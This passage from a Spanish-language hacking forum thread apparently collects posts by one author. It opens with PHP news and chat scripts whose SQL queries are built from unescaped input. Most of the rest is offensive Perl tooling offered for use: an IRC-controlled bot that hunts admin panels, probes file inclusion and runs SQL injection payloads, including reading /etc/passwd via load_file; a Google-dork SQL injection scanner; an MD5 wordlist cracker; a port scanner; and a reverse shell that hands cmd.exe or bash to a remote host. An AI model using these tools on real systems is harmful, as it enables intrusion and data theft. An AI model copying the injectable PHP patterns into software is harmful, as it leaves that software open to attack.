$this->contenido = $contenido;
$this->fecha = $fecha;
$test = mysql_connect($host,$user,$pass);
@mysql_select_db($db,$test);

}

public function eliminar($id) {
if (is_numeric($id)) {
if (@mysql_query("DELETE FROM ".$this->tabla." where id='".$id."'")) {
return true;
}
}
}

public function nuevo($x_id,$x_titulo,$x_contenido,$x_fecha) {
if (is_numeric($x_id)) {
if (@mysql_query("INSERT INTO ".$this->tabla."(".$this->id.",".$this->titulo.",".$this->contenido.",".$this->fecha.")values('".$x_id."','".$x_titulo."','".$x_contenido."','$x_fecha')")) {
return true; 
}
}
}

public function ver($id) {
if (is_numeric($id)) {
if ($que = @mysql_query("SELECT ".$this->id.",".$this->titulo.",".$this->contenido.",".$this->fecha." FROM ".$this->tabla." WHERE ".$this->id."='".$id."'")) {
while ($ver = @mysql_fetch_array($que)) {
return array($ver[0],$ver[1],$ver[2],$ver[3]);
}
}
}
}

public function mod($id,$tit,$con,$fech) {
if (is_numeric($id)) {
if (@mysql_query("UPDATE ".$this->tabla." SET ".$this->id."="."'".$id."'".",".$this->titulo."="."'".$tit."'".",".$this->contenido."="."'".$con."'".",".$this->fecha."="."'".$fech."'"." where id='".$id."'")) {
return true; 
}
}
}
	
public function close() {
$test->close;
}


}

?>

Ejemplo de uso

noticia.php

Código: text


<?php


include("noticion.php");
$noti = New noticion;
$noti->datos("localhost","root","123","noticias","noticia","id","titulo","cotenido","fecha");
//$noti->nuevo("3","hola","dfdfdfdf","5465465");
$noti->eliminar("'");

if ($noti->mod("3","holax","dfdfdfdf","5465465")) {
echo "cambiado<br><br>";
}

if ($ver = $noti->ver(3)) {
echo $ver[1]."<br>";
}



//}

//if ($noti->mod("1","cambie","cambie,"cambie")) {
//echo "cambiado";
//}

Como siempre , cualquier falla ,vulnerabilidad ,sugerencia seran
bienvenidas para la mejora de la clase

#330

Back-end / [PHP] Simple Chat By Doddy H

Julio 03, 2011, 09:51:25 PM

Como dice el titulo , es un simple chat que se divide en 3 partes

install.php

Código: php


<?php

//Datos para la DB

$host = "localhost";
$user = "root";
$pass = "";
$db = "chat";

echo "
<title>Instalacion de mini chat</title>
<br><br><b>Seguro que desea instalar mini chat</b><br><br>
<form action='' method=POST>
<input type=submit name=instalar value=Instalar>
</form>
<br><br>";


if (isset($_POST['instalar'])) {

if (mysql_connect($host,$user,$pass)) {

$todo2 = "create table $db.mensajes (
id_comentario int(10) UNSIGNED NOT NULL AUTO_INCREMENT,
mensaje TEXT NOT NULL,
apodo VARCHAR(255) NOT NULL,
PRIMARY KEY (id_comentario));
";


if (@mysql_query($todo1)) {
echo "1";
if (@mysql_query($todo2)) {
echo "chat instalado<br>";
}
} else {
echo "error en la instalacion<br>";
}
} else {
echo "error en la conexion con la db<br>";
}
} 

?>

admin.php

Código: php


<?php

$host = "localhost";
$user = "root";
$pass = "";

$usera = "test";
$passa = "test";

if (isset($_GET['user'])) {

if ($_GET['user'] == $usera) {
if ($_GET['pass'] == $passa) {

@mysql_connect($host,$user,$pass);

$re = @mysql_query("select * from chat.mensajes");

if (is_numeric($_GET['id'])) {
if (@mysql_query("delete from chat.mensajes where id_comentario='".$_GET['id']."'")) {
echo "<script>alert('Comentario borrado');</script>";
}
}


while ($ver = @mysql_fetch_array($re)) {
echo "<a href=?user=".$usera."&pass=".$passa."&id=".$ver[0].">Borrar comentario ".$ver[0]."</a><br>";
}

}
}


}

?>

index.php

Código: php


<?php

$db = "chat"; //
$host = "localhost";
$user = "root";
$pass = "";

echo "
<style>

.main {
word-wrap: break-word;
word-break:break-all; 
margin			: -287px 0px 0px -490px;
border			: White solid 1px;
BORDER-COLOR: #00FF00; 
}

td,body {
background-color:black;color:#00FF00; 
}


input,textarea,select {
font: normal 10px Verdana, Arial, Helvetica,
sans-serif;
background-color:black;color:#00FF00; 
border: solid 1px #00FF00;
border-color:#00FF00
}

</style>";

mysql_connect($host,$user,$pass);
mysql_select_db($db);

echo "<table border=0 width='300' style='table-layout: fixed'>";
echo "<td class=main><b>Mini Chat 0.2</b></td><tr>";


$sumo = mysql_query("SELECT MAX(id_comentario) FROM $db.mensajes");

$s = mysql_fetch_row($sumo);

foreach ($s as $d) {
$total = $d;
}

$test = $total - 10;

if ($test <= 0) {
next;
} else {
$resto = $test;

for ($i = 1; $i <= $resto; $i++) {
@mysql_query("DELETE FROM $db.mensajes where id_comentario='$i'");
}

}


$re = @mysql_query("select * from $db.mensajes order by id_comentario DESC");

while ($ver = @mysql_fetch_array($re)) {
echo "<td class=main><b>".$ver[2]."</b>:".$ver[1]."</td><tr>";
}


echo "<br><br><td class=main><br><b>Dejar mensaje</b><br><br>	
<form action='' method=POST>
Apodo : <input type=text name=apodo size=25><br>
Texto : <input type=text name=msg size=25><br><br>
<input type=submit name=chatentro value=Mandar>
</form>
<td><tr>
<td class=main><b>Coded By Doddy H</b></td><tr>
</table>";


if (isset($_POST['chatentro'])) {

$sumo = mysql_query("SELECT MAX(id_comentario) FROM $db"."."."mensajes");

$s = mysql_fetch_row($sumo);

foreach ($s as $d) {
$x_id = $d+1;
}

$apodo = htmlentities(addslashes($_POST['apodo']));
$mensaje  = htmlentities(addslashes($_POST['msg']));

$apodo = substr($apodo,0,70);
$mensaje = substr($mensaje,0,70);

$insultos = array("lammer","lamer","puto","noob");

foreach ($insultos as $con) {
$mensaje = str_replace($con,"#$!*",$mensaje);
$apodo = str_replace($con,"#$!*",$apodo);
}

@mysql_query("INSERT INTO $db"."."."mensajes"."("."id_comentario".","."apodo".","."mensaje".")values('".$x_id."','".$apodo."','".$mensaje."')");

echo '<meta http-equiv="refresh" content=0;URL=>';

}

?>

Esa serian las tres partes , el chat tiene las siguientes opciones

Solo permite 10 mensajes por lo que borra por antiguedad
Filtra malas palabras

Eso seria todo

Cualquier vulnerabilidad la reportan

#331

Perl / [Perl] Terr0r B0t By Doddy H

Julio 03, 2011, 09:50:28 PM

Hola a todos.

Hoy les traigo un programa que hice anoche , este es un bot irc ,el cual
tiene las siguientes opciones :

* Codificacion y decodificacion de base64 , hex , ascii
* Buscar panel de administracion de algun sitio
* Scan SQLI (busca numero de columnas y da info)
* Tool para explotar LFI

Comandos para el bot en el canal

Código: perl


!base64 encode/decode string
!hex encode/decode string
!ascii encode/decode string
!panel http://127.0.0.1 
!sqli http://127.0.0.1/sql.php?id=
!lfi http://127.0.0.1/lfi.php?file='

Forma de uso :

Código: perl


C:/Users/DoddyH/Desktop/Arsenal X>terror-b0t.pl


[+] tERR0R b0T (c) dODDy HacKMaN 2010

[+] Starting the bot
[+] Online

Código: perl


#!usr/bin/perl
#Terr0r B0t (C) Doddy Hackman 2010
#Commands to use
#
#!base64 encode/decode string
#!hex encode/decode string
#!ascii encode/decode string
#!panel http://127.0.0.1
#!sqli http://127.0.0.1/sql.php?id=
#!lfi http://127.0.0.1/lfi.php?file='
#
#




	
use IO::Socket;
use LWP::UserAgent;
use HTTP::Request::Common;



@dns = ('www','www1','www2','www3','ftp','ns','mail','3com','aix','apache','back','bind','boreder','bsd','business','chains','cisco','content','corporate','cpv','dns','domino','dominoserver','download','e-mail','e-safe','email','esafe','external','extranet','firebox','firewall','front','fw','fw0','fwe','fw-1','firew','gate','gatekeeper','gateway','gauntlet','group','help','hop','hp','hpjet','hpux','http','https','hub','ibm','ids','info','inside','internal','internet','intranet','ipfw','irix','jet','list','lotus','lotusdomino','lotusnotes','lotusserver','mailfeed','mailgate','mailgateway','mailgroup','mailhost','maillist','mailpop','mailrelay','mimesweeper','ms','msproxy','mx','nameserver','news','newsdesk','newsfeed','newsgroup','newsroom','newsserver','nntp','notes','noteserver','notesserver','nt','outside','pix','pop','pop3','pophost','popmail','popserver','print','printer','private','proxy','proxyserver','public','qpop','raptor','read','redcreek','redhat','route','router','scanner','screen','screening','s#ecure','seek','smail','smap','smtp','smtpgateway','smtpgw','solaris','sonic','spool','squid','sun','sunos','suse','switch','transfer','trend','trendmicro','vlan','vpn','wall','web','webmail','webserver','webswitch','win2000','win2k','upload','file','fileserver','storage','backup','share','core','gw','wingate','main','noc','home','radius','security','access','dmz','domain','sql','mysql','mssql','postgres','db','database','imail','imap','exchange','sendmail','louts','test','logs','stage','staging','dev','devel','ppp','chat','irc','eng','admin','unix','linux','windows','apple','hp-ux','bigip','pc');


@panels=('admin/admin.asp','admin/login.asp','admin/index.asp','admin/admin.aspx','admin/login.aspx','admin/index.aspx','admin/webmaster.asp','admin/webmaster.aspx','asp/admin/index.asp','asp/admin/index.aspx','asp/admin/admin.asp','asp/admin/admin.aspx','asp/admin/webmaster.asp','asp/admin/webmaster.aspx','admin/','login.asp','login.aspx','admin.asp','admin.aspx','webmaster.aspx','webmaster.asp','login/index.asp','login/index.aspx','login/login.asp','login/login.aspx','login/admin.asp','login/admin.aspx','administracion/index.asp','administracion/index.aspx','administracion/login.asp','administracion/login.aspx','administracion/webmaster.asp','administracion/webmaster.aspx','administracion/admin.asp','administracion/admin.aspx','php/admin/','admin/admin.php','admin/index.php','admin/login.php','admin/system.php','admin/ingresar.php','admin/administrador.php','admin/default.php','administracion/','administracion/index.php','administracion/login.php','administracion/ingresar.php','administracion/admin.php','administration/','administration/index.php','administration/login.php','administrator/index.php','administrator/login.php','administrator/system.php','system/','system/login.php','admin.php','login.php','administrador.php','administration.php','administrator.php','admin1.html','admin1.php','admin2.php','admin2.html','yonetim.php','yonetim.html','yonetici.php','yonetici.html','adm/','admin/account.php','admin/account.html','admin/index.html','admin/login.html','admin/home.php','admin/controlpanel.html','admin/controlpanel.php','admin.html','admin/cp.php','admin/cp.html','cp.php','cp.html','administrator/','administrator/index.html','administrator/login.html','administrator/account.html','administrator/account.php','administrator.html','login.html','modelsearch/login.php','moderator.php','moderator.html','moderator/login.php','moderator/login.html','moderator/admin.php','moderator/admin.html','moderator/','account.php','account.html','controlpanel/','controlpanel.php','controlpanel.html','admincontrol.php','admincontrol.html','adminpanel.php','adminpanel.html','admin1.asp','admin2.asp','yonetim.asp','yonetici.asp','admin/account.asp','admin/home.asp','admin/controlpanel.asp','admin/cp.asp','cp.asp','administrator/index.asp','administrator/login.asp','administrator/account.asp','administrator.asp','modelsearch/login.asp','moderator.asp','moderator/login.asp','moderator/admin.asp','account.asp','controlpanel.asp','admincontrol.asp','adminpanel.asp','fileadmin/','fileadmin.php','fileadmin.asp','fileadmin.html','administration.html','sysadmin.php','sysadmin.html','phpmyadmin/','myadmin/','sysadmin.asp','sysadmin/','ur-admin.asp','ur-admin.php','ur-admin.html','ur-admin/','Server.php','Server.html','Server.asp','Server/','wp-admin/','administr8.php','administr8.html','administr8/','administr8.asp','webadmin/','webadmin.php','webadmin.asp','webadmin.html','administratie/','admins/','admins.php','admins.asp','admins.html','administrivia/','Database_Administration/','WebAdmin/','useradmin/','sysadmins/','admin1/','system-administration/','administrators/','pgadmin/','directadmin/','staradmin/','ServerAdministrator/','SysAdmin/','administer/','LiveUser_Admin/','sys-admin/','typo3/','panel/','cpanel/','cPanel/','cpanel_file/','platz_login/','rcLogin/','blogindex/','formslogin/','autologin/','support_login/','meta_login/','manuallogin/','simpleLogin/','loginflat/','utility_login/','showlogin/','memlogin/','members/','login-redirect/','sub-login/','wp-login/','login1/','dir-login/','login_db/','xlogin/','smblogin/','customer_login/','UserLogin/','login-us/','acct_login/','admin_area/','bigadmin/','project-admins/','phppgadmin/','pureadmin/','sql-admin/','radmind/','openvpnadmin/','wizmysqladmin/','vadmind/','ezsqliteadmin/','hpwebjetadmin/','newsadmin/','adminpro/','Lotus_Domino_Admin/','bbadmin/','vmailadmin/','Indy_admin/','ccp14admin/','irc-macadmin/','banneradmin/','sshadmin/','phpldapadmin/','macadmin/','administratoraccounts/','admin4_account/','admin4_colon/','radmind-1/','Super-Admin/','AdminTools/','cmsadmin/','SysAdmin2/','globes_admin/','cadmins/','phpSQLiteAdmin/','navSiteAdmin/','server_admin_small/','logo_sysadmin/','server/','database_administration/','power_user/','system_administration/','ss_vms_admin_sm/');

my $nave = LWP::UserAgent->new();
$nave->timeout(13);
$nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");


print "\n[+] tERR0R b0T (c) dODDy HacKMaN 2010\n\n";

my $servidor = "127.0.0.1"; #Servidor IRC
my $canal = "#locos"; #Canal IRC del servidor especificado
my $nick = "Lepuke-Slave"; # Apodo del bot
my $port = "6667"; # Puerto del servidor IRC

print "[+] Starting the bot\n";

my $soquete = new IO::Socket::INET( PeerAddr =>$servidor,
PeerPort => $port,
Proto => 'tcp' );
 	
if (!$soquete) {
print "\n[-] No se puedo conectar en $servidor $port\n";
exit 1;
}


print $soquete "NICK $nick\r\n";
print $soquete "USER $nick 1 1 1 1\r\n";
print $soquete "JOIN $canal\r\n";

print "[+] Online\n\n";

while ( my $log = <$soquete> ) {
chomp($log);

if ($log =~ /^PING(.*)$/i){
print $soquete "PONG $1\r\n";
}

if($log =~ m/:!panel (.*)$/g) {
scan($1);
print $soquete "PRIVMSG $canal : [+] Scan Finished\r\n";
}

if($log =~ m/:!sqli (.*)$/g) {
print $soquete "PRIVMSG $canal : [+] SQL Scan Starting\r\n";
scan2($1);
}

if($log =~ m/:!fuzzdns (.*)$/g) {
scan1($1);
print $soquete "PRIVMSG $canal : [+] Scan Finished\r\n";
}

if($log =~ m/:!lfi (.*)$/g) {
lfi($1);
print $soquete "PRIVMSG $canal : [+] Scan Finished\r\n";
}



if($log =~ m/:!base64 (.*) (.*)$/g) {
use MIME::Base64;
my ($opcion,$aa) = ($1,$2);
if ($opcion eq "encode") {
print $soquete "PRIVMSG $canal : [+] Text : $aa\r\n";
print $soquete "PRIVMSG $canal : [+] Encode : ".encode_base64($aa)."\r\n";
}
elsif ($opcion eq "decode") {
print $soquete "PRIVMSG $canal : [+] Encode : $aa\r\n";
print $soquete "PRIVMSG $canal : [+] Text : ".decode_base64($aa)."\r\n";
}
else {
print $soquete "PRIVMSG $canal : ??\r\n";
}
}

if($log =~ m/:!ascii (.*) (.*)$/) {
my ($opcion,$aa) = ($1,$2);
chomp $aa;
if ($opcion eq "encode") {
print $soquete "PRIVMSG $canal : [+] Text : $aa\r\n";
print $soquete "PRIVMSG $canal : [+] Encode : ".ascii($aa)."\r\n";
}
elsif ($opcion eq "decode") {
print $soquete "PRIVMSG $canal : [+] Encode : $aa\r\n";
print $soquete "PRIVMSG $canal : [+] Text : ".ascii_de($aa)."\r\n";
}
else {
print $soquete "PRIVMSG $canal : ???\r\n";
}
}

if($log =~ m/:!hex (.*) (.*)$/) {
my ($opcion,$aa) = ($1,$2);
chomp $aa;
if ($opcion eq "encode") {
print $soquete "PRIVMSG $canal : [+] Text : $aa\r\n";
print $soquete "PRIVMSG $canal : [+] Encode : ".encode($aa)."\r\n";
} 
elsif ($opcion eq "decode") {
print $soquete "PRIVMSG $canal : [+] Encode : $aa\r\n";
print $soquete "PRIVMSG $canal : [+] Text : ".decode($aa)."\r\n";
}
else {
print $soquete "PRIVMSG $canal : ????\r\n";
}
}
}

sub lfi { 
print $soquete "PRIVMSG $canal : [+] Target confirmed : $_[0]"."\r\n";
print $soquete "PRIVMSG $canal : [+] Status : [scanning]"."\r\n";
$code = toma($_[0]);
if ($code=~/No such file or directory in <b>(.*)<\/b> on line/ig) {
print $soquete "PRIVMSG $canal : [+] Vulnerable !"."\r\n";
print $soquete "PRIVMSG $canal : [*] Full path discloure detected : $1"."\r\n";
print $soquete "PRIVMSG $canal : [+] Status : [fuzzing files]"."\r\n";
for my $file(@buscar3) {
$code1 = toma($_[0].$file);
unless ($code1=~/No such file or directory in <b>(.*)<\/b> on line/ig) {
$ok = 1;
print $soquete "PRIVMSG $canal : [File Found] : ".$_[0].$file."\r\n";
}
}
unless($ok == 1) {
print $soquete "PRIVMSG $canal : [-] Dont found any file"."\r\n";
}
} else {
print $soquete "PRIVMSG $canal : [-] Page not vulnerable to LFI"."\r\n";
}
}


sub scan1 {
print $soquete "PRIVMSG $canal : [*] Searching DNS to ".$_[0]."\r\n";
for my $path(@dns) {
$code = tomax("http://".$path.".".$_[0]);
if ($code->is_success) {
print $soquete "PRIVMSG $canal : http://".$path.".".$_[0]."\r\n";
}
}
}

sub scan {
print $soquete "PRIVMSG $canal [*] Searching panels to ".$_[0]."\r\n";
for my $path(@panels) {
$code = tomax($_[0]."/".$path);
if ($code->is_success) {
print "\a";
$ct = 1;
print $soquete "PRIVMSG $canal [Link] : ".$_[0]."/".$path."\r\n";
}
}
if ($ct ne 1) { 
print $soquete "PRIVMSG $canal [-] Not found any path\r\n";
}
}



sub scan2 {

my $rows  = "0";
my $asc;
my $page = $_[0];

($pass1,$pass2) = &bypass($ARGV[1]);
$inyection = $page."-1".$pass1."order".$pass1."by"."9999999999".$pass2;
$code = toma($inyection);
if($code=~ /supplied argument is not a valid MySQL result resource in <b>(.*)<\/b> on line /ig || $code=~ /mysql_free_result/ig || $code =~ /mysql_fetch_assoc/ig ||$code =~ /mysql_num_rows/ig || $code =~ /mysql_fetch_array/ig || $code =~/mysql_fetch_assoc/ig || $code=~/mysql_query/ig || $code=~/mysql_free_result/ig || $code=~/equivocado en su sintax/ig || $code=~/You have an error in your SQL syntax/ig || $code=~/Call to undefined function/ig) {
$code1 = toma($page."-1".$pass1."union".$pass1."select".$pass1."666".$pass2);
if ($code1=~/The used SELECT statements have a different number of columns/ig) {
my $path = $1;
chomp $path;
$alert = "char(".ascii("RATSXPDOWN1RATSXPDOWN").")";
$total = "1";
for my $rows(2..52) {
$asc.= ","."char(".ascii("RATSXPDOWN".$rows."RATSXPDOWN").")"; 
$total.= ",".$rows;
$injection = $page."-1".$pass1."union".$pass1."select".$pass1.$alert.$asc;
$test = toma($injection);
if ($test=~/RATSXPDOWN/) {
@number = $test =~m{RATSXPDOWN(\d+)RATSXPDOWN}g;
print $soquete "PRIVMSG $canal : [Page] : $page\r\n";
print $soquete "PRIVMSG $canal : [Limit] : The site has $rows columns\r\n";
print $soquete "PRIVMSG $canal : [Data] : The number @number print data\r\n";
if ($test=~/RATSXPDOWN(\d+)/) {
if ($path) {
print $soquete "PRIVMSG $canal : [Full Path Discloure] : $path\r\n";
}
$total=~s/@number[0]/hackman/;
print $soquete "PRIVMSG $canal : [+] Injection SQL : ".$page."-1".$pass1."union".$pass1."select".$pass1.$total."\r\n";
&details($page."-1".$pass1."union".$pass1."select".$pass1.$total,$_[1]);
last;
}
}
}
}
} 

sub details {
my $page = $_[0];
($pass1,$pass2) = &bypass($ARGV[1]);
if ($page=~/(.*)hackman(.*)/ig) {
my $start = $1; my $end = $2;
$test1 = toma($start."unhex(hex(concat(char(69,82,84,79,82,56,53,52))))".$end.$pass1."from".$pass1."information_schema.tables".$pass2);
$test2 = toma($start."unhex(hex(concat(char(69,82,84,79,82,56,53,52))))".$end.$pass1."from".$pass1."mysql.user".$pass2);
$test3 = toma($start."unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))))".$end.$pass2);
if ($test2=~/ERTOR854/ig) {
print $soquete "PRIVMSG $canal : [+] Posibilidad de ver usuarios con mysql.user\r\n";
}
if ($test1=~/ERTOR854/ig) {
print $soquete "PRIVMSG $canal : [+] Se pueden ver todo con information_schema\r\n";
}
if ($test3=~/ERTOR854/ig) {
print $soquete "PRIVMSG $canal : [+] load_file permite ver los archivos\r\n";
}
$code = toma($start."unhex(hex(concat(char(69,82,84,79,82,56,53,52),version(),char(69,82,84,79,82,56,53,52),database(),char(69,82,84,79,82,56,53,52),user(),char(69,82,84,79,82,56,53,52))))".$end.$pass2);
if ($code=~/ERTOR854(.*)ERTOR854(.*)ERTOR854(.*)ERTOR854/g) {
print $soquete "PRIVMSG $canal : [!] DB Version : $1\r\n";
print $soquete "PRIVMSG $canal : [!] DB Name : $2\r\n";
print $soquete "PRIVMSG $canal : [!] user_name : $3\r\n";
} else {
print $soquete "PRIVMSG $canal : [-] Not found any data\r\n";
}
print $soquete "PRIVMSG $canal : [+] Scan Finished\r\n";
}
}
}

sub bypass {
if ($_[0] eq "/*") { return ("/**/","/*"); }
elsif ($_[0] eq "%20") { return ("%20","%00"); }
else {return ("+","--");}}


sub ascii {
return join ',',unpack "U*",$_[0]; 
}

sub ascii_de {
$_[0] = join q[], map { chr } split q[,],$_[0];
return $_[0];
}


sub encode {
my $string = $_[0];
$hex = '0x';
for (split //,$string) {
$hex .= sprintf "%x", ord;
}return $hex;}

sub decode {
$_[0] =~ s/^0x//;
$encode = join q[], map { chr hex } $_[0] =~ /../g;
return $encode;
}

sub toma {
return $nave->request (GET $_[0])->content;
}

sub tomax {
return $nave->request (GET $_[0]);
}

#The End

#332

Perl / [Perl] Search MD5

Julio 03, 2011, 09:50:07 PM

Hola a todos

HOy acabo de hacer un crackeador de hash md5 con salto o sin el
En esta version es con ventanas usandos tk

Código: perl


#Search MD5 
#Version : Tk
#Author : Doddy Hackman


use Tk;
use Digest::MD5;
use Tk::FileSelect;
use Tk::ROText;

if ($^O eq 'MSWin32') {
use Win32::Console; 
Win32::Console::Free();
}

my $w = MainWindow->new(-background=>"black");
$w->title("Search MD5");
$w->geometry("500x200+20+20");
$w->resizable(0,0);
$w->Label(-text=>"Search MD5",-background=>"black",-foreground=>"cyan",-font=>"Impact")->pack();
$w->Label(-text=>"Hash",-background=>"black",-foreground=>"green")->place(-x =>40, -y => 55);
my $hash = $w->Entry(-text=>"30d554c3665c8f204622b2003c77d994",-background=>"black",-foreground=>"green")->place(-x =>90, -y => 55);
$w->Label(-text=>"Salt",-background=>"black",-foreground=>"green")->place(-x =>260, -y => 55);
my $salt = $w->Entry(-text=>"X",-background=>"black",-foreground=>"green")->place(-x =>290, -y => 55);
$w->Label(-text=>"Wordlist",-background=>"black",-foreground=>"green")->place(-x =>40, -y => 100);
my $o = $w->Entry(-textvariable=>\$file,-background=>"black",-foreground=>"green")->place(-x =>90, -y => 100);
$w->Button(-text=>"Browse",-background=>"black",-foreground=>"red",-activebackground=>"red",-command=>\&oper)->place(-x =>230, -y => 100);
$w->Button(-text=>"Crack!",-foreground=>"green",-background=>"black",-command=>\&crack,-activebackground=>"green")->place(-x =>180, -y => 160);
$w->Button(-text=>"About",-foreground=>"green",-background=>"black",-command=>\&about,-activebackground=>"green")->place(-x =>240, -y => 160);
$w->Button(-text=>"Exit",-foreground=>"green",-background=>"black",-command=>[$w =>'destroy'],-activebackground=>"green")->place(-x =>300, -y => 160);

sub oper{ 
$w->update;
$browse = $w->FileSelect(-directory => "/");
my $file = $browse->Show;
$o->configure (-text =>$file);
}

sub about {
my $venta = MainWindow->new(-background=>"black");
$venta->geometry("300x180+20+20");
$venta->title("About");
$venta->resizable(0,0);
$venta->Label(-text=>"\nSearch MD5\n\n\nProgrammer : Doddy Hackman\n\nContact : lepuke[at]hotmail[com]\n\n",-background=>"black",-foreground=>"yellow")->pack();
$venta->Button(-text=>"Exit",-foreground=>"yellow",-background=>"black",-command => [$venta => 'destroy'],-activebackground=>'yellow')->pack()
}

sub crack {
my $hash = $hash->get;
my $salt = $salt->get;
my $wordlist = $o->get;

my $console = MainWindow->new(-background=>"black");
$console->title("Status");
$console->resizable(0,0);
$console->geometry("400x320+20+20");
$console->Label(-text=>"Status",-background=>"black",-foreground=>"green",-font=>"Impact")->pack();
my $box = $console->ROText(-background=>"black",-foreground=>"green",-width=> 45,-height=> 15)->place(-x =>40,-y=>50);
$console->Button(-text=>"Exit",-background=>"black",-foreground=>"green",-activebackground=>"green",-command=> [$console => 'destroy'],-width=>"20")->place(-x =>130, -y => 280);
if ($salt eq "X") { $salt = "";}
unless (-f $wordlist) { $box->insert('end',"\n\n[-] Wordlist dont exist!\n\n");next;}
if(length($hash)==32) {
$box->insert('end',"[Hash] : $hash\n[Salt] : $salt\n[Wordlist] : $wordlist\n\n");
open word,$wordlist;
@words = <word>;
close word;
for my $pass(@words) {
chomp $pass;
$console->update;
$box->insert('end',"[+] Trying with $pass\n");
$digest = Digest::MD5->md5_hex($pass.$salt);chomp $digest;
if ($digest == $hash) {print "\a\a";$box->insert('end',"\n[Hash encoded] : $hash\n[Hash decoded] : $pass\n\n");$ok="1";last;}
}} else { $box->insert('end',"\n\n[-] The hash is incorrect\n\n");next;}
unless ($ok eq "1") {$box->insert('end',"\n\n[-] Sorry , hash not cracked\n\n");next;}}

MainLoop;

Si lo quieren descargar desde sourceforge

Código: text


https://sourceforge.net/projects/searchmd5x/

#333

Perl / [Perl] Search in google for scan SQLI

Julio 03, 2011, 09:49:49 PM

Un simple scanner de SQLI para usar en google

Código: perl


#!usr/bin/perl
#Search Google for scan SQLI
#(C) Doddy Hackman 2011

use LWP::UserAgent;
use HTML::LinkExtor;

my $nave = LWP::UserAgent->new;
$nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");
$nave->timeout(5);

head();

print "\n\n[Dork] : ";
chomp(my $dork = <stdin>);
print "\n\n[Pages] : ";
chomp(my $pages = <stdin>);
print "\n\n[Starting the search]\n\n";
my @links = google($dork,$pages);
print "\n[Links Found] : ".int(@links)."\n\n\n";
print "[Starting the scan]\n\n\n";
for my $link(@links) {
if ($link=~/(.*)=/ig) {
my $web = $1;
sql($web."=");
}}
print "\n\n[+] Finish\n";
copyright();
<stdin>;

sub google {
my($a,$b) = @_;
for ($pages=10;$pages<=$b;$pages=$pages+10) {
$code = toma("http://www.google.com.ar/search?hl=&q=".$a."&start=$pages");
my @links = get_links($code);
for my $l(@links) {
if ($l =~/webcache.googleusercontent.com/) {
push(@url,$l);
}
}
}

for(@url) {
if ($_ =~/cache:(.*?):(.*?)\+/) {
push(@founds,$2);
}
}

my @founds = repes(@founds);

return @founds; 
}


sub sql {
my ($pass1,$pass2) = ("+","--");
my $page = shift;
$code1 = toma($page."-1".$pass1."union".$pass1."select".$pass1."666".$pass2);
if ($code1=~/The used SELECT statements have a different number of columns/ig) {
print "[+] SQLI : $page\a\n";
}}

sub get_links {

$test = HTML::LinkExtor->new(\&agarrar)->parse($_[0]);
return @links;

sub agarrar {
my ($a,%b) = @_;
push(@links,values %b); 
}
}

sub repes {
foreach $test(@_) {
push @limpio,$test unless $repe{$test}++;
}
return @limpio;
}

sub head {
print "\n\n-- == Search Google == --\n\n";
}

sub copyright {
print "\n\n(C) Doddy Hackman 2011\n\n";
exit(1);
}

sub toma {
return $nave->get($_[0])->content;
}

sub tomar {
my ($web,$var) = @_;
return $nave->post($web,[%{$var}])->content;
}

#Thanks to explorer (PerlEnEspañol)
# ¿ The End ?

#334

Perl / [Perl] Scan Port By Doddy H

Julio 03, 2011, 09:49:34 PM

HOla a todos aca les traigo un simple scanner de puertos
hecho en perl

Código: perl


#!usr/bin/perl
#Scan Port
#(C) Doddy Hackman 2011
#Creditos

use IO::Socket;

head();
unless($ARGV[0]) {
print "\n\n[sintax] : ".$0." <ip> \n\n";
} else {
scan($ARGV[0]);
}
copyright();

sub scan {

my %ports = ("21"=>"ftp",
"22"=>"ssh",
"25"=>"smtp",
"80"=>"http",
"110"=>"pop3",
"3306"=>"mysql"
);


print "\n[+] Scanning $_[0]\n\n\n";

for my $port(keys %ports) {

if (new IO::Socket::INET(PeerAddr => $_[0],PeerPort => $port,Proto => "tcp",Timeout  => 0.5)) {
print "[Port] : ".$port." [Service] : ".$ports{$port}."\n";
}
}

}

sub head {
print "\n\n-- == Scan Port == --\n\n";
}

sub copyright {
print "\n\n(C) Doddy Hackman 2011\n\n";
exit(1);
}

Ejemplo de uso

Código: text


perl scan.pl localhost

#335

Perl / [Perl] Reverse Shell By Doddy

Julio 03, 2011, 09:49:16 PM

Hola a todos.

Hoy traigo un simple reverse shell en esta version solo pueden conectarse al server que tiene netcat
despues ofrece informacion depende del sistema operativo que tiene el que ejecuto el script.
En la version 0.2 le agregare deteccion de kernel y su posible exploit.

Código: perl


#!usr/bin/perl
#Reverse Shell 0.1
#By Doddy H

use IO::Socket;

print "\n== -- Reverse Shell 0.1 - Doddy H 2010 -- ==\n\n";

unless (@ARGV == 2) { 
print "[Sintax] : $0 <host> <port>\n\n";
exit(1);
} else {
print "[+] Starting the connection\n";
print "[+] Enter in the system\n";
print "[+] Enjoy !!!\n\n";
conectar($ARGV[0],$ARGV[1]);
tipo();
}

sub conectar {
socket(REVERSE, PF_INET, SOCK_STREAM, getprotobyname('tcp'));
connect(REVERSE, sockaddr_in($_[1],inet_aton($_[0])));
open (STDIN,">&REVERSE");
open (STDOUT,">&REVERSE");
open (STDERR,">&REVERSE");
}

sub tipo {
print "\n[*] Reverse Shell Starting...\n\n";
if ($^O =~/Win32/ig) {
infowin();
system("cmd.exe");
} else {
infolinux();
#root();  
system("bin/bash");
}
}

sub infowin {
print "[+] Domain Name : ".Win32::DomainName()."\n";
print "[+] OS Version : ".Win32::GetOSName()."\n";
print "[+] Username : ".Win32::LoginName()."\n\n\n";
}

sub infolinux {
print "[+] System information\n\n";
system("uname -a");
}

#The End

#336

Perl / [Perl] PasteBin Uploader

Julio 03, 2011, 09:49:04 PM

Bueno aca eh terminado un programa que los ayudara a publicar sus programas
en pastebin de una forma rapida y sin ganas xDDD

Entonces , este programa tiene dos opciones :

Publica solo un archivo

Publica todos los archivos en un directorio

Tambien detecta el tipo de extension para poder publicar el codigo en su respectivo tipo de codigo

Código: perl


#!usr/bin/perl
#Paste Bin Uploader (C) Doddy Hackman 2011

use LWP::UserAgent;
use HTTP::Request::Common;	

my $nave = LWP::UserAgent->new();
$nave->timeout(10);
$nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");

menu();

sub menu {

clean();
header();

print "\n\n[Options]\n\n";
print "[1] : Upload a file\n";
print "[2] : Upload a directory\n";
